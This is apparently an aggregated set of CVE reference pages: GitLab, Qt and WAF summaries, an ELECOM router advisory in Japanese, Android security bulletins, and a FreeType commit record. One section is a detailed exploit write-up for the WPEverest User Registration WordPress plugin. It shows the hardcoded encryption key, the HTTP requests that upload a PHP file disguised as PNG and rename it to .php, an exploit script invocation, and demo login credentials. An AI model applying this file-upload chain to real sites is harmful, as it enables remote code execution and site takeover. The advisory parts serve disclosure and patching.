coreruleset (aka OWASP ModSecurity Core Rule Set) through 3.3.4 does not block multiple Content-Type headers, which might allow attackers to bypass a WAF with a crafted payload, aka "Content-Type confusion." This occurs when the web application relies on only the last Content-Type header.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-38199: Fix C9K-230327 · Issue #3191 · coreruleset/coreruleset

An information disclosure issue in GitLab CE/EE affecting all versions from 16.0 prior to 16.0.6, and version 16.1.0 allows unauthenticated actors to access the import error information if a project was imported from GitHub.

CVE-2023-3362

An issue has been discovered in GitLab CE/EE affecting all versions starting from 7.14 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1, which allows an attacker to inject HTML in an email address field.

CVE-2023-2200

The User Registration plugin for WordPress is vulnerable to arbitrary file uploads due to a hardcoded encryption key and missing file type validation on the 'ur_upload_profile_pic' function in versions up to, and including, 3.0.2. This makes it possible for authenticated attackers with subscriber-level capabilities or above to upload arbitrary files on the affected site's server which may make remote code execution possible. This was partially patched in version 3.0.2 and fully patched in version 3.0.2.1.

The plugin was affected by an Arbitrary File Upload vulnerability. Due to a hardcoded encryption key and a missing file type validation, it is even possible to upload a php file to the website.

**Let’s check the plugin**

The profile_pic_upload() method in the UR_AJAX class includes the following code for image upload:

    if ( isset( $_FILES['file']['size'] ) && wp_unslash( sanitize_key( $_FILES['file']['size'] ) ) ) {
    	if ( ! function_exists( 'wp_handle_upload' ) ) {
    		include_once ABSPATH . 'wp-admin/includes/file.php';
    	}
    
    	$upload = isset( $_FILES['file'] ) ? $_FILES['file'] : array(); // phpcs:ignore
    
    	// valid extension for image.
    	$valid_extensions = 'image/jpeg,image/gif,image/png';
    	$form_id          = ur_get_form_id_by_userid( $user_id );
    
    	if ( class_exists( 'UserRegistrationAdvancedFields' ) ) {
    		$field_data       = ur_get_field_data_by_field_name( $form_id, 'profile_pic_url' );
    		$valid_extensions = isset( $field_data['advance_setting']->valid_file_type ) ? implode( ', ', $field_data['advance_setting']->valid_file_type ) : $valid_extensions;
    	}
    
    	$valid_extension_type = explode( ',', $valid_extensions );
    	$valid_ext            = array();
    
    	foreach ( $valid_extension_type as $key => $value ) {
    		$image_extension   = explode( '/', $value );
    		$valid_ext[ $key ] = isset( $image_extension[1] ) ? $image_extension[1] : '';
    
    		if ( 'jpeg' === $valid_ext[ $key ] ) {
    			$index               = count( $valid_extension_type );
    			$valid_ext[ $index ] = 'jpg';
    		}
    	}
    
    	$src_file_name  = isset( $upload['name'] ) ? $upload['name'] : '';
    	$file_extension = strtolower( pathinfo( $src_file_name, PATHINFO_EXTENSION ) );
    
    	// Validates if the uploaded file has the acceptable extension.
    	if ( ! in_array( $file_extension, $valid_ext ) ) {
    		wp_send_json_error(
    			array(
    				'message' => __( 'Invalid file type, please contact with site administrator.', 'user-registration' ),
    			)
    		);
    	}
    
    	$upload_path = ur_get_tmp_dir();
    
    	// Checks if the upload directory has the write premission.
    	if ( ! wp_is_writable( $upload_path ) ) {
    		wp_send_json_error(
    			array(
    				'message' => __( 'Upload path permission deny.', 'user-registration' ),
    			)
    		);
    	}
    	$upload_path = $upload_path . '/';
    	$file_name   = wp_unique_filename( $upload_path, $upload['name'] );
    	$file_path   = $upload_path . sanitize_file_name( $file_name );
    	if ( move_uploaded_file( $upload['tmp_name'], $file_path ) ) {
    		$files = array(
    			'file_name'      => $file_name,
    			'file_path'      => $file_path,
    			'file_extension' => $file_extension,
    		);
    
    		$attachment_id = wp_rand();
    
    		ur_clean_tmp_files();
    		$url = UR_UPLOAD_URL . 'temp-uploads/' . sanitize_file_name( $file_name );
    		wp_send_json_success(
    			array(
    				'attachment_id' => $attachment_id,
    				'upload_files'  => crypt_the_string( maybe_serialize( $files ), 'e' ),
    				'url'           => $url,
    			)
    		);
    	} else {
    		wp_send_json_error(
    			array(
    				'message' => __( 'File cannot be uploaded.', 'user-registration' ),
    			)
    		);
    	}
    }

This is an common image upload solution that uploads the file to the UR_UPLOAD_URL . 'temp-uploads/' folder. It is uploaded to the temp folder because the ajax function only uploads the image to the website, but in order to set the uploaded image as a profile image, the user profile must be updated separately.

The file upload reponse will be json like this:

    {
        "success": true,
        "data": {
            "attachment_id": 3642301417,
            "upload_files": "RDN2T1VCZzh0c3l6UktucnljcHNDQ0c3RUpDakVPTGR0eElQdmh5L0hRVDd2Q2hWYWdqME9ROVVtc3h6ZlU3ZVFtQlNVbEEyTyt3ZmdTQVJVMVlBRXlvQU8ralV4OWxkTTVuMHJrMFZsYTZUUVNpbXZTaHFSVFg1cGpjWnFUTUo4Z2U0VFN6R3Z4TjYxaXNBZzRCQ1lDYWk1V09MTGQ0K1grYnlVSWxOUTMrM2szSHJ4RHN3TDhsTGlMYWJhWVArdWh4MlNMY2VTVnlJSHpMZFdsdFdDUnhzSUlzaWZVTVJ4bDRoMHlZMVMrTCtDUjBHT25sSlNSaVdGT3l2VEowUVR6T2dlbDB3Z2l3ZkMzbVlteER1c0Qxem83WjZQeHQyUDQ2R0tHWnZNeWc9",
            "url": "https:\/\/lana.solutions\/vdb\/wpeverest-user-registration\/wp-content\/uploads\/user_registration_uploads\/temp-uploads\/exploit.png"
        }
    }

The upload_files contains contains the data of the uploaded file encrypted.

The purpose of encryption is to prevent unauthorized access to the data during profile updates (since the data is generated by the website in this case). It is only possible to decrypt and view the data using the correct encryption key, which should ideally be unique and kept confidential for each website. This means that the user should not know the encryption key (also referred to as the passphrase), and therefore cannot decrypt and view the data.

The crypt_the_string() function includes the following encrytion and decryption method, the action depends on the function parameter:

    function crypt_the_string( $string, $action = 'e' ) {
    	$secret_key = 'ur_secret_key';
    	$secret_iv  = 'ur_secret_iv';
    
    	$output         = false;
    	$encrypt_method = 'AES-256-CBC';
    	$key            = hash( 'sha256', $secret_key );
    	$iv             = substr( hash( 'sha256', $secret_iv ), 0, 16 );
    
    	if ( 'e' == $action ) {
    		if ( function_exists( 'openssl_encrypt' ) ) {
    			$output = base64_encode( openssl_encrypt( $string, $encrypt_method, $key, 0, $iv ) );
    		} else {
    			$output = base64_encode( $string );
    		}
    	} elseif ( 'd' == $action ) {
    		if ( function_exists( 'openssl_decrypt' ) ) {
    			$output = openssl_decrypt( base64_decode( $string ), $encrypt_method, $key, 0, $iv );
    		} else {
    			$output = base64_decode( $string );
    		}
    	}
    
    	return $output;
    }

As we can see passphrase and iv are hardcoded in the function.

If we use the crypt_the_string() function to decrypt upload_files, then we get a serialized array, and when we deserialized it, the content will be something like this:

file_name: exploit.png  
file_path: /var/www/wp-content/uploads/user_registration_uploads/temp-uploads/exploit.png  
file_extension: png

As you can see, this contains the file name, path and extension.

This also means that the file has been successfully uploaded, as we can see the file path. Which is currently in the temp folder.

After that, we can save the profile picture with the profile details save function.

The user_registration_before_save_profile_details() method in the UR_Frontend class contains the following code:

    ur_upload_profile_pic( $valid_form_data, $user_id );

The ur_upload_profile_pic() function includes the following code for save the profile picture:

    $upload_path = UR_UPLOAD_PATH . 'profile-pictures'; /*Get path of upload dir of User Registration for profile pictures*/

    $upload = maybe_unserialize( crypt_the_string( $upload_file, 'd' ) );
    if ( isset( $upload['file_name'] ) && isset( $upload['file_path'] ) && isset( $upload['file_extension'] ) ) {
    	$upload_path = $upload_path . '/';
    	$file_name   = wp_unique_filename( $upload_path, $upload['file_name'] );
    	$file_path   = $upload_path . sanitize_file_name( $file_name );
    	// Check the type of file. We'll use this as the 'post_mime_type'.
    	$filetype = wp_check_filetype( basename( $file_name ), null );
    	$moved    = rename( $upload['file_path'], $file_path );
    
    	if ( $moved ) {
    		$attachment_id = wp_insert_attachment(
    			array(
    				'guid'           => $file_path,
    				'post_mime_type' => $filetype['type'],
    				'post_title'     => preg_replace( '/\.[^.]+$/', '', sanitize_file_name( $file_name ) ),
    				'post_content'   => '',
    				'post_status'    => 'inherit',
    			),
    			$file_path
    		);
    
    		if ( ! is_wp_error( $attachment_id ) ) {
    			include_once ABSPATH . 'wp-admin/includes/image.php';
    
    			// Generate and save the attachment metas into the database.
    			wp_update_attachment_metadata( $attachment_id, wp_generate_attachment_metadata( $attachment_id, $file_path ) );
    		}
    	}
    }

As we can see, this decrypts the $upload_file and then moves and renames the uploaded file in the temp folder to the $upload_path folder using the rename() function. There is a wp_check_filetype() function in the code, but the file extension is not checked before renaming, which means that we can rename our png image file to any file.

**Let’s see how we can exploit this vulnerability**

How the exploit works step by step:

*   Register a user
*   Log in to the user
*   Upload the malicious exploit.png image file
*   Retrieve the encrypted file data from the response
*   Decrypt the file data
*   Modify the file extension to php in the file name
*   Encrypt the file data
*   Save the profile with the encrypted and modified file data

Since the encryption key is hardcoded, we can decrypt, modify and encrypt the file data.

The file exploit.png contains the following code:

    <?php
    echo 'md5("exploit"): ' . md5( 'exploit' );

As we can see, this is a php file that we saved with png extension.

Upload the file with the following HTTP request:

    POST /vdb/wpeverest-user-registration/wp-admin/admin-ajax.php?action=user_registration_profile_pic_upload&security=788a0a823e HTTP/1.1
    Host: lana.solutions
    Content-Type: multipart/form-data; boundary=WebKitFormBoundaryLanaCodes
    
    --WebKitFormBoundaryLanaCodes
    Content-Disposition: form-data; name="file"; filename="exploit.png"
    Content-Type: image/png
    
    <?php
    echo 'md5("exploit"): ' . md5( 'exploit' );
    --WebKitFormBoundaryLanaCodes--

The response will be a json containing the encrypted upload_files. We have to decrypt it with the php function using the hardcoded encryption key, which returns a serialized array, something like this:

file_name: exploit.png  
file_path: /var/www/wp-content/uploads/user_registration_uploads/temp-uploads/exploit.png  
file_extension: png

It is important to change the extension only in file name in the deserialized array:

file_name: exploit.png needs to be changed to exploit.php

Then we have to encrypt the modified upload_files.

Save the profile with the following HTTP request:

    POST /vdb/wpeverest-user-registration/wp-admin/admin-ajax.php HTTP/1.1
    Host: lana.solutions
    Content-Type: application/x-www-form-urlencoded
    
    action=save_profile_details&_wpnonce=63c08e3e46&user_registration_user_login=demo&profile_pic_url=RDN2T1VCZzh0c3l6UktucnljcHNDQ0c3RUpDakVPTGR0eElQdmh5L0hRUnI4cWVmYVF1N0VEcWYvSG9VbjJFWUdDOHg5Qmh4VmN1eGdWREdFVDJ5RjRUZ0FCcjdtaTgrTEtRaGxSRWRFaDNWb1ZkdFJZYUFxMTJmQkcwMUQ3aVRNYVlML09iZFBUNWZkYWxhV1FzcVVlYWtLWlBpR2dCK2hHcmxhc2gzeWZLb0VMcmRxUmRuajBpY0Vaa2JLY0VRMXZQU2ZHcHJ1ZkRTN2RqTzRZWTNsUm54YjlYZzUwa1J6Vm14Um1TQVB6WWZ6VlhaTGtnZXJKcXhxeVdVa0lQVVNiSjlHUTBVb29iUTdjcVpleVJpbktZZC9UczdTSTlsZ1l5MWdrMDhzZG89

The profile_pic_url will be the modified and encrypted upload_files.

This exploit renames and moves the file, which we can access using a browser.

This is how the exploit works:  

**The exploit script**

I created a PHP script that uploads the exploit php file:

Source: wpeverest\_user\_registration\_upload\_php\_file\_exploit.php

How to use:

    php wpeverest_user_registration_upload_php_file_exploit.php --website_url="https://lana.solutions/vdb/wpeverest-user-registration/" --username="demo" --password="demo"

We get something like this:

    The file exists and contains the exploit.

We can also check the file using a browser by opening the following link: https://lana.solutions/vdb/wpeverest-user-registration/wp-content/uploads/user\_registration\_uploads/profile-pictures/exploit.php

**Try it**

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I set that only the php file in the exploit script can be uploaded. So all php files with other content are prohibited.

Website: https://lana.solutions/vdb/wpeverest-user-registration/  
Username: demo  
Password: demo

CVE-2023-3342: User Registration by WPEverest WordPess plugin Arbitrary File Upload

ELECOM wireless LAN routers WRC-1167GHBK-S v1.03 and earlier, and WRC-1167GEBK-S v1.03 and earlier allow a network-adjacent authenticated attacker to execute an arbitrary command by sending a specially crafted request to the web management page.

拝啓  
平素は格別のご高配を賜り、厚く御礼申し上げます。  
当社製の一部の無線LANルーター・中継器におきまして、以下脆弱性が判明いたしました。  
つきましては、下記内容に従って当社対象製品のファームウェアアップデートを行っていただきますようお願い申し上げます。

お客様に大変ご迷惑をおかけしますことを深くお詫び申し上げます。何卒ご理解とご協力を賜りますようお願い申し上げます。

敬具

**対象製品の脆弱性と対処方法**

◀テーブルはスクロールできます

対象製品

脆弱性

想定される影響

対処方法

関連情報

WRH-300WH-H

①クロスサイトスクリプティングの脆弱性

②オープンリダイレクトの脆弱性

①当該製品にログイン可能な攻撃者によって、任意のスクリプトが実行される

②当該製品にログインした状態のユーザーが、細工されたURLにアクセスすることで、悪意あるサイトにリダイレクトされる可能性がある

Ver.2.21以降のファームウェアをご利用ください。ファームウェアをこちら よりダウンロードし、アップデートを行ってください。

JVN#05223215

WTC-300HWH

Ver.1.16以降のファームウェアをご利用ください。ファームウェア更新は自動で行われます。

WTC-C1167GC-B  
WTC-C1167GC-W

①クロスサイトリクエストフォージェリの脆弱性

②オープンリダイレクトの脆弱性

①当該製品にログインした状態のユーザーが、細工されたページにアクセスした場合、意図しない操作をさせられる

②当該製品にログインした状態のユーザーが、細工されたURLにアクセスすることで、悪意あるサイトにリダイレクトされる可能性がある

Ver.1.19以降のファームウェアをご利用ください。ファームウェア更新は自動で行われます。

WRC-1167GHBK-S

①認証後、任意のコマンドまたはコードが実行可能

②情報漏えいの脆弱性

①対象製品にLAN側からログイン可能な攻撃者によって、任意のコマンドまたはコードを実行される可能性がある

②対象製品にLAN側からアクセス可能な攻撃者によって、機微な情報を搾取される可能性がある

Ver.1.05以降のファームウェアをご利用ください。ファームウェア更新は自動で行われます。

JVN#05223215  
JVNVU#91850798

WRC-1167GEBK-S

Ver.1.05以降のファームウェアをご利用ください。ファームウェア更新は自動で行われます。

WRC-1167FEBK-S

Ver.1.05以降のファームウェアをご利用ください。ファームウェア更新は自動で行われます。

JVN#05223215

WRC-1167GHBK3-A

①認証不備により任意のコマンドが実行可能

②認証後、任意のコマンドまたはコードが実行可能

③情報漏えいの脆弱性

①対象製品にLAN側からアクセス可能な攻撃者によって、任意の コマンドを実行される可能性がある

②対象製品にLAN側からログイン可能な攻撃者によって、任意の コマンドまたはコードを実行される可能性がある

③対象製品にLAN側からアクセス可能な攻撃者によって、機微な情報を搾取される可能性がある

Ver.1.27以降のファームウェアをご利用ください。ファームウェアをこちらよりダウンロードし、アップデートを行ってください。

JVN#05223215  
JVNVU#91850798

WRC-1167FEBK-A

Ver.1.23以降のファームウェアをご利用ください。ファームウェアをこちらよりダウンロードし、アップデートを行ってください。

**参考情報**

*   このリリースに掲載されている会社名・製品名等は、一般に各社の商標又は登録商標です。
*   このリリースに記載の内容は、発表当時の情報です。 予告なく変更されることがありますので、あらかじめご了承ください。
*   プレス用にエレコム製品の画像をご希望の方は、画像データベースシステム をご利用ください。

CVE-2023-37568: 無線LANルーター・中継器のセキュリティ向上のためのファームウェアアップデートのお願い - 最新情報 - セキュリティ情報｜ELECOM

An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.10 before 15.11.10, all versions starting from 16.0 before 16.0.6, all versions starting from 16.1 before 16.1.1. It may be possible for users to view new commits to private projects in a fork created while the project was public.

CVE-2023-2190

An issue was discovered in Qt before 5.15.15, 6.x before 6.2.10, and 6.3.x through 6.5.x before 6.5.3. There are infinite loops in recursive entity expansion.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-38197

In notification access permission dialog box, malicious application can embedded a very long service label that overflow the original user prompt and possibly contains mis-leading information to be appeared as a system message for user confirmation.



_Published July 5, 2023_

The Android Automotive OS (AAOS) Update Bulletin contains details of security vulnerabilities affecting the Android Automotive OS platform. The full AAOS update comprises the security patch level of 2023-07-05 or later from the July 2023 Android Security Bulletin in addition to all issues in this bulletin.

We encourage all customers to accept these updates to their devices.

The issue in this bulletin is a high security vulnerability in the Packages component that could allow a malicious application to embed a service label that overflow the original user prompt and possibly contain mis-leading information as a system message for user confirmation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

**Announcements**

*   In addition to the security vulnerabilities described in the July 2023 Android Security Bulletin, the July 2023 Android Automotive OS Update Bulletin also contains patches specifically for AAOS vulnerabilities as described below.

**2023-07-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-07-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Packages**

The vulnerability in this section could allow a malicious application to embed a service label that overflow the original user prompt and possibly contain mis-leading information as a system message for user confirmation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21260

A-259384309

EoP

High

11, 12, 12L, 13

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, read the instructions on the Google device update schedule.

*   Security patch levels of 2023-07-01 or later address all issues associated with the 2023-07-01 security patch level.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-07-01\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-07-01 security patch level. Please see this article for more details on how to install security updates.

**2\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**3\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**4\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**5\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

July 5, 2023

Bulletin Published

CVE-2023-21260: Android Automotive OS Update Bulletin—July 2023

In SettingsHomepageActivity.java, there is a possible way to launch arbitrary activities via Settings due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.



_Published July 5, 2023 | Updated July 10, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-07-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-07-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-07-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could allow possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20918

A-243794108 \[2\] \[3\]

EoP

High

11, 12, 12L, 13

CVE-2023-20942

A-258021433 \[2\] \[3\]

EoP

High

12, 12L, 13

CVE-2023-21145

A-265293293

EoP

High

11, 12, 12L, 13

CVE-2023-21245

A-222446076

EoP

High

11, 12, 12L, 13

CVE-2023-21251

A-204554636

EoP

High

11, 12, 12L, 13

CVE-2023-21254

A-254736794

EoP

High

13

CVE-2023-21257

A-257443065

EoP

High

13

CVE-2023-21262

A-279905816

EoP

High

12, 12L, 13

CVE-2023-21238

A-277740848

ID

High

11, 12, 12L, 13

CVE-2023-21239

A-274592467

ID

High

12, 12L, 13

CVE-2023-21249

A-217981062

ID

High

13

CVE-2023-21087

A-261723753

DoS

High

11, 12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-21250

A-261068592

RCE

Critical

11, 12, 12L, 13

CVE-2023-2136

A-278113033

RCE

High

13

CVE-2023-21241

A-271849189

EoP

High

11, 12, 12L, 13

CVE-2023-21246

A-273729476

EoP

High

11, 12, 12L, 13

CVE-2023-21247

A-277333781

EoP

High

12, 12L, 13

CVE-2023-21248

A-277333746

EoP

High

12, 12L, 13

CVE-2023-21256

A-268193384

EoP

High

13

CVE-2023-21261

A-271680254

ID

High

11, 12, 12L, 13

CVE-2023-20910

A-245299920 \[2\]

DoS

High

11, 12, 12L, 13

CVE-2023-21240

A-275340417

DoS

High

11, 12, 12L, 13

CVE-2023-21243

A-274445194

DoS

High

11, 12, 12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

WiFi

CVE-2023-20910, CVE-2023-21240, CVE-2023-21243

**2023-07-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-07-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-42703

A-253167854  
Upstream kernel

EoP

High

MemoryManagement

CVE-2023-21255

A-275041864  
Upstream kernel

EoP

High

Binder

**Kernel components**

The vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

    

CVE

References

Type

Severity

Subcomponent

CVE-2023-25012

A-268589017  
Upstream kernel \[2\] \[3\] \[4\]

EoP

High

HID

**Arm components**

These vulnerabilities affect Arm components and further details are available directly from Arm. The severity assessment of these issues is provided directly by Arm.

   

CVE

References

Severity

Subcomponent

CVE-2021-29256

A-283489460\*

High

Mali

CVE-2022-28350

A-226921651\*

High

Mali

CVE-2023-28147

A-274005916 \*

High

Mali

CVE-2023-26083

A-272073598\*

Moderate

Mali

**Imagination Technologies**

This vulnerability affects Imagination Technologies components and further details are available directly from Imagination Technologies. The severity assessment of this issue is provided directly by Imagination Technologies.

   

CVE

References

Severity

Subcomponent

CVE-2021-0948

A-281905774\*

High

PowerVR-GPU

**MediaTek components**

These vulnerabilities affect MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

   

CVE

References

Severity

Subcomponent

CVE-2023-20754

A-280380543  
M-ALPS07563028 \*

High

keyinstall

CVE-2023-20755

A-280374982  
M-ALPS07510064 \*

High

keyinstall

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2023-21672

A-276751075  
QC-CR#3313322

High

Audio

CVE-2023-22386

A-276750584  
QC-CR#3355665 \[2\]

High

WLAN

CVE-2023-22387

A-276750306  
QC-CR#3356023 \[2\] \[3\] \[4\]

High

Kernel

CVE-2023-24851

A-276751076  
QC-CR#3359589 \[2\] \[3\]

High

WLAN

CVE-2023-24854

A-276750639  
QC-CR#3366343 \[2\]

High

WLAN

CVE-2023-28541

A-276750665  
QC-CR#3144133

High

WLAN

CVE-2023-28542

A-276750246  
QC-CR#3104318

High

WLAN

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

   

CVE

References

Severity

Subcomponent

CVE-2023-21629

A-264414032\*

Critical

Closed-source component

CVE-2023-21631

A-264415234\*

High

Closed-source component

CVE-2023-22667

A-276750583\*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-07-01 or later address all issues associated with the 2023-07-01 security patch level.
*   Security patch levels of 2023-07-05 or later address all issues associated with the 2023-07-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-07-01\]
*   \[ro.build.version.security\_patch\]:\[2023-07-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-07-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-07-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-07-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

July 5, 2023

Bulletin published

1.1

July 10, 2023

Bulletin revised to include AOSP links

CVE-2023-21256: Android Security Bulletin—July 2023

In ft_open_face_internal of ftobjs.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.



)\]}' { "commit": "d45f0e49ab54065eb72d92aa3cc5f2152b0910b7", "tree": "234ad317e206c974e924b6e8391f37f236de846a", "parents": \[ "3416d942a1d2940c6875f540a404045b5c761d66" \], "author": { "name": "Werner Lemberg", "email": "wl@gnu.org", "time": "Sat Mar 19 06:40:17 2022 +0100" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Thu May 11 18:39:17 2023 +0000" }, "message": "DO NOT MERGE - Cherry-pick two upstream changes\\n\\nThis cherry picks following two changes:\\n\\n0c2bdb01a2e1d24a3e592377a6d0822856e10df2\\n22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5\\n\\nBug: 271680254\\nTest: N/A\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:4ffa271ab538f57b65a65d434a2df9d3f8cd2f4a)\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:8abb5b963d8f3bac3224c09edff6dcbbd11bf508)\\nMerged-In: I42469df8e8b07221d64e3f8574c4f30110dbda7e\\nChange-Id: I42469df8e8b07221d64e3f8574c4f30110dbda7e\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "883f1a8970c65ed9258fbb808a900208b62cc03b", "old\_mode": 33188, "old\_path": "src/base/ftobjs.c", "new\_id": "46baf5fed652302b63a3ad6392698c527dbe9e49", "new\_mode": 33188, "new\_path": "src/base/ftobjs.c" } \] }